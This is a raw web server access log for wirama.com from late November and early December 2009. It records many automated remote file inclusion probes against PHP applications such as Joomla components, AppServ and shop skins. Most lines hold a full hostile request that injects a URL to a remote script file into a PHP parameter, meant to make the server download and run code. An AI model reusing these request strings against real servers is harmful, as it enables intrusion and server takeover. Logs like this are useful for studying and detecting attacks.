217.73.201.235 - - [30/Nov/2009:21:56:55 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.thelumosalliance.com/swpranks/old???????? HTTP/1.1" 200 3518 "-" "Mozilla/5.0" "wirama.com"
217.73.201.235 - - [30/Nov/2009:21:56:55 -0800] "GET /logs/access_090329.log///?_SERVER[DOCUMENT_ROOT]=http://www.thelumosalliance.com/swpranks/old???????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
217.73.201.235 - - [30/Nov/2009:21:57:33 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.thelumosalliance.com/swpranks/old???????? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
217.73.201.235 - - [30/Nov/2009:21:57:34 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.thelumosalliance.com/swpranks/old???????? HTTP/1.1" 200 3518 "-" "Mozilla/5.0" "wirama.com"
217.73.201.235 - - [30/Nov/2009:21:57:40 -0800] "GET /logs/access_090329.log///?_SERVER[DOCUMENT_ROOT]=http://www.thelumosalliance.com/swpranks/old???????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.202.2.220 - - [30/Nov/2009:21:58:30 -0800] "GET /appserv/errors.php?appserv_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.202.2.220 - - [30/Nov/2009:21:58:30 -0800] "GET /logs//appserv/errors.php?appserv_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.202.2.220 - - [30/Nov/2009:21:58:30 -0800] "GET /logs/access_090501.log//appserv/errors.php?appserv_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.202.2.220 - - [30/Nov/2009:21:58:30 -0800] "GET /logs/access_090501.log//appserv/errors.php?appserv_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.202.2.220 - - [30/Nov/2009:21:58:30 -0800] "GET /logs//appserv/errors.php?appserv_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.202.2.220 - - [30/Nov/2009:21:58:30 -0800] "GET /appserv/errors.php?appserv_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
84.22.133.229 - - [30/Nov/2009:21:59:15 -0800] "GET /logs/access_090329.log//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.250.230.32 - - [30/Nov/2009:22:02:39 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.wirama.com"
211.202.2.220 - - [30/Nov/2009:22:03:35 -0800] "GET /appserv/errors.php?appserv_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.202.2.220 - - [30/Nov/2009:22:03:35 -0800] "GET /logs/access_090501.log//appserv/errors.php?appserv_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.202.2.220 - - [30/Nov/2009:22:03:35 -0800] "GET /logs//appserv/errors.php?appserv_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.202.2.220 - - [30/Nov/2009:22:03:36 -0800] "GET /logs//appserv/errors.php?appserv_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.202.2.220 - - [30/Nov/2009:22:03:36 -0800] "GET /logs/access_090501.log//appserv/errors.php?appserv_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.202.2.220 - - [30/Nov/2009:22:03:36 -0800] "GET /appserv/errors.php?appserv_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.202.2.220 - - [30/Nov/2009:22:03:37 -0800] "GET /logs//appserv/errors.php?appserv_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.202.2.220 - - [30/Nov/2009:22:03:37 -0800] "GET /logs/access_090501.log//appserv/errors.php?appserv_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.202.2.220 - - [30/Nov/2009:22:03:37 -0800] "GET /appserv/errors.php?appserv_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
217.73.201.235 - - [30/Nov/2009:22:04:23 -0800] "GET /logs/access_090329.log///?_SERVER[DOCUMENT_ROOT]=http://www.thelumosalliance.com/swpranks/old???????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.202.2.220 - - [30/Nov/2009:22:04:57 -0800] "GET /logs/access_090501.log//appserv/errors.php?appserv_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.202.2.220 - - [30/Nov/2009:22:04:57 -0800] "GET /logs//appserv/errors.php?appserv_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.202.2.220 - - [30/Nov/2009:22:04:58 -0800] "GET /appserv/errors.php?appserv_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.202.2.220 - - [30/Nov/2009:22:04:59 -0800] "GET /logs//appserv/errors.php?appserv_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.202.2.220 - - [30/Nov/2009:22:04:59 -0800] "GET /logs/access_090501.log//appserv/errors.php?appserv_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.202.2.220 - - [30/Nov/2009:22:04:59 -0800] "GET /appserv/errors.php?appserv_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.202.2.220 - - [30/Nov/2009:22:04:59 -0800] "GET /logs/access.log//appserv/errors.php?appserv_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
217.73.201.235 - - [30/Nov/2009:22:05:44 -0800] "GET /logs/access_090329.log///?_SERVER[DOCUMENT_ROOT]=http://www.thelumosalliance.com/swpranks/old???????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [30/Nov/2009:22:11:34 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [30/Nov/2009:22:11:34 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [30/Nov/2009:22:11:34 -0800] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [30/Nov/2009:22:13:34 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [30/Nov/2009:22:14:18 -0800] "GET /logs/access_090330.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [30/Nov/2009:22:21:47 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [30/Nov/2009:22:21:47 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [30/Nov/2009:22:21:47 -0800] "GET /logs/access_090501.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [30/Nov/2009:22:22:22 -0800] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [30/Nov/2009:22:25:36 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [30/Nov/2009:22:25:36 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [30/Nov/2009:22:25:36 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [30/Nov/2009:22:26:26 -0800] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [30/Nov/2009:22:32:50 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [30/Nov/2009:22:32:50 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [30/Nov/2009:22:32:50 -0800] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [30/Nov/2009:22:34:49 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [30/Nov/2009:22:34:49 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [30/Nov/2009:22:34:49 -0800] "GET /logs/access_090501.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [30/Nov/2009:22:34:49 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [30/Nov/2009:22:34:49 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [30/Nov/2009:22:35:25 -0800] "GET /logs/access_090330.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [30/Nov/2009:22:36:26 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [30/Nov/2009:22:36:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [30/Nov/2009:22:36:26 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [30/Nov/2009:22:38:28 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [30/Nov/2009:22:38:28 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [30/Nov/2009:22:38:28 -0800] "GET /logs/access_090501.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [30/Nov/2009:22:39:01 -0800] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [30/Nov/2009:22:42:22 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [30/Nov/2009:22:42:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [30/Nov/2009:22:42:22 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [30/Nov/2009:22:43:21 -0800] "GET /logs/access_090501.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
124.217.242.210 - - [30/Nov/2009:22:44:36 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://imperadocmd.fileave.com/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
124.217.242.210 - - [30/Nov/2009:22:44:36 -0800] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://imperadocmd.fileave.com/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
124.217.242.210 - - [30/Nov/2009:22:44:36 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://imperadocmd.fileave.com/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.18.192.91 - - [30/Nov/2009:22:45:56 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://clicklynx.com/UserFiles/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.18.192.91 - - [30/Nov/2009:22:46:01 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://clicklynx.com/UserFiles/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.18.192.91 - - [30/Nov/2009:22:46:01 -0800] "GET /logs/access_090331.log//components/com_simpleboard/image_upload.php?sbp=http://clicklynx.com/UserFiles/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.18.192.91 - - [30/Nov/2009:22:47:29 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://clicklynx.com/UserFiles/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.18.192.91 - - [30/Nov/2009:22:47:29 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://clicklynx.com/UserFiles/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.18.192.91 - - [30/Nov/2009:22:47:29 -0800] "GET /logs/access_090329.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://clicklynx.com/UserFiles/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.18.192.91 - - [30/Nov/2009:22:48:32 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://clicklynx.com/UserFiles/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.18.192.91 - - [30/Nov/2009:22:48:32 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://clicklynx.com/UserFiles/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.18.192.91 - - [30/Nov/2009:22:48:32 -0800] "GET /logs/access_090329.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://clicklynx.com/UserFiles/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
82.165.193.182 - - [30/Nov/2009:22:50:26 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.ryugen.com/forms/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
82.165.193.182 - - [30/Nov/2009:22:50:26 -0800] "GET /logs/access_090501.log//index.php?DOCUMENT_ROOT=http://www.ryugen.com/forms/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
82.165.193.182 - - [30/Nov/2009:22:50:26 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.ryugen.com/forms/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
211.193.106.56 - - [30/Nov/2009:22:56:47 -0800] "GET /logs//admin.lib.inc.php?path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.106.56 - - [30/Nov/2009:22:56:47 -0800] "GET /admin.lib.inc.php?path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.106.56 - - [30/Nov/2009:22:56:47 -0800] "GET /logs/access_090501.log//admin.lib.inc.php?path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.106.56 - - [30/Nov/2009:22:57:07 -0800] "GET /logs/access_090731.log//admin.lib.inc.php?path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.130.198.40 - - [30/Nov/2009:23:02:31 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://imperadocmd.fileave.com/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.130.198.40 - - [30/Nov/2009:23:02:31 -0800] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://imperadocmd.fileave.com/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.130.198.40 - - [30/Nov/2009:23:02:31 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://imperadocmd.fileave.com/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [30/Nov/2009:23:27:13 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [30/Nov/2009:23:27:13 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [30/Nov/2009:23:27:13 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [30/Nov/2009:23:43:27 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS%20[gs_input]=deadbeef&shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [30/Nov/2009:23:43:27 -0800] "GET /logs/access_090329.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS%20[gs_input]=deadbeef&shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [30/Nov/2009:23:43:27 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS%20[gs_input]=deadbeef&shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [30/Nov/2009:23:43:32 -0800] "GET /logs/access_090501.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS%20[gs_input]=deadbeef&shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [30/Nov/2009:23:44:58 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS%20[gs_input]=deadbeef&shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [30/Nov/2009:23:44:58 -0800] "GET /logs/access_090501.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS%20[gs_input]=deadbeef&shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [30/Nov/2009:23:46:32 -0800] "GET /logs/access_090601.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS%20[gs_input]=deadbeef&shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [30/Nov/2009:23:46:32 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS%20[gs_input]=deadbeef&shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [30/Nov/2009:23:46:32 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS%20[gs_input]=deadbeef&shop_this_skin_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [30/Nov/2009:23:49:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [30/Nov/2009:23:49:53 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [30/Nov/2009:23:49:53 -0800] "GET /logs/access_090501.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [30/Nov/2009:23:50:00 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.250.230.32 - - [30/Nov/2009:23:54:31 -0800] "GET /logs/ HTTP/1.1" 200 3512 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.wirama.com"
75.125.107.130 - - [01/Dec/2009:00:03:31 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://mubankaii.no-ip.biz:8090//appserv/sql.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.125.107.130 - - [01/Dec/2009:00:03:31 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://mubankaii.no-ip.biz:8090//appserv/sql.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
75.125.107.130 - - [01/Dec/2009:00:03:32 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://mubankaii.no-ip.biz:8090//appserv/sql.txt? HTTP/1.1" 200 3517 "-" "Mozilla/5.0" "wirama.com"
75.125.107.130 - - [01/Dec/2009:00:05:40 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://mubankaii.no-ip.biz:8090//appserv/sql.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
75.125.107.130 - - [01/Dec/2009:00:05:40 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://mubankaii.no-ip.biz:8090//appserv/sql.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.125.107.130 - - [01/Dec/2009:00:05:40 -0800] "GET /logs/access_090731.log//?_SERVER[DOCUMENT_ROOT]=http://mubankaii.no-ip.biz:8090//appserv/sql.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.125.107.130 - - [01/Dec/2009:00:05:40 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://mubankaii.no-ip.biz:8090//appserv/sql.txt? HTTP/1.1" 200 3517 "-" "Mozilla/5.0" "wirama.com"
66.249.65.244 - - [01/Dec/2009:00:12:57 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.wirama.com"
77.221.130.11 - - [01/Dec/2009:00:29:43 -0800] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:00:29:43 -0800] "GET /skin/zero_vote/error.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:00:29:43 -0800] "GET /logs/access_090601.log//skin/zero_vote/error.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:00:29:43 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:00:29:46 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:00:29:46 -0800] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:00:29:46 -0800] "GET /skin/zero_vote/error.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
